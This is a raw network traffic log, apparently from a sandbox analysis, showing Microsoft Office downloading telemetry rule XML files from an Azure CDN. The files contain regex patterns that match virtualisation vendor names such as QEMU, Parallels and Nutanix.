Accept-Ranges: bytes
2024-10-30 02:46:42 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
55192.168.2.44981413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:43 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:43 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:43 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
ETag: "0x8DC582BB556A907"
x-ms-request-id: a342e9ea-d01e-0066-419c-27ea17000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024643Z-16849878b78z2wx67pvzz63kdg00000005y000000000scn0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:43 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
56192.168.2.44981113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:43 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:43 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:43 GMT
Content-Type: text/xml
Content-Length: 485
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
ETag: "0x8DC582BB9769355"
x-ms-request-id: e574f622-301e-0052-4beb-2565d6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024643Z-16849878b78qf2gleqhwczd21s00000007pg000000005v5z
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:43 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
57192.168.2.44981313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:43 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:43 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:43 GMT
Content-Type: text/xml
Content-Length: 470
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
ETag: "0x8DC582BBB181F65"
x-ms-request-id: a3f41134-c01e-00ad-7d0b-29a2b9000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024643Z-15b8d89586flspj6y6m5fk442w0000000d6g00000000fzd2
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:43 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
58192.168.2.44981213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:43 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:43 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:43 GMT
Content-Type: text/xml
Content-Length: 411
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B989AF051"
x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024643Z-16849878b785jrf8dn0d2rczaw00000008mg000000009ada
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:43 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
59192.168.2.44980813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:43 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:43 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:43 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
ETag: "0x8DC582B9FF95F80"
x-ms-request-id: d518f54b-201e-006e-10e8-28bbe3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024643Z-15b8d89586fnsf5zkvx8tfb0zc00000002h000000000a862
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:43 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
60192.168.2.44981513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:44 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:44 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:44 GMT
Content-Type: text/xml
Content-Length: 502
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB6A0D312"
x-ms-request-id: f4a85f8f-401e-00ac-0701-270a97000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024644Z-16849878b78x6gn56mgecg60qc000000093g00000000t736
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:44 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
61192.168.2.44981613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:44 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:44 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:44 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D30478D"
x-ms-request-id: 9cbc4178-801e-008f-12a3-262c5d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024644Z-16849878b786fl7gm2qg4r5y7000000007qg00000000b7fg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:44 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
62192.168.2.44981713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:44 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:44 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:44 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3F48DAE"
x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024644Z-16849878b78x6gn56mgecg60qc000000099g000000004e7g
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:44 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
63192.168.2.44981913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:44 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:44 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:44 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3CAEBB8"
x-ms-request-id: 1d33856d-201e-000c-0612-2979c4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024644Z-r197bdfb6b4skzzvqpzzd3xetg00000006tg00000000ct4m
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:44 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
64192.168.2.44981813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:44 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:44 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:44 GMT
Content-Type: text/xml
Content-Length: 408
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
ETag: "0x8DC582BB9B6040B"
x-ms-request-id: 4bda8ee7-201e-0003-1763-27f85a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024644Z-16849878b78wc6ln1zsrz6q9w8000000073g00000000bwzu
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:44 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
65192.168.2.44982213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:45 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:45 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:45 GMT
Content-Type: text/xml
Content-Length: 432
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
ETag: "0x8DC582BAABA2A10"
x-ms-request-id: 18d6d76d-f01e-0052-73f2-249224000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024645Z-15b8d89586f4zwgbgswvrvz4vs00000008s000000000aeuh
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:45 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


Session IDSource IPSource PortDestination IPDestination Port
66192.168.2.44982113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:45 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:45 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:45 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
ETag: "0x8DC582B91EAD002"
x-ms-request-id: ff288f8c-c01e-007a-5a0e-26b877000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024645Z-17c5cb586f6wnfhvhw6gvetfh400000006zg000000002rey
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
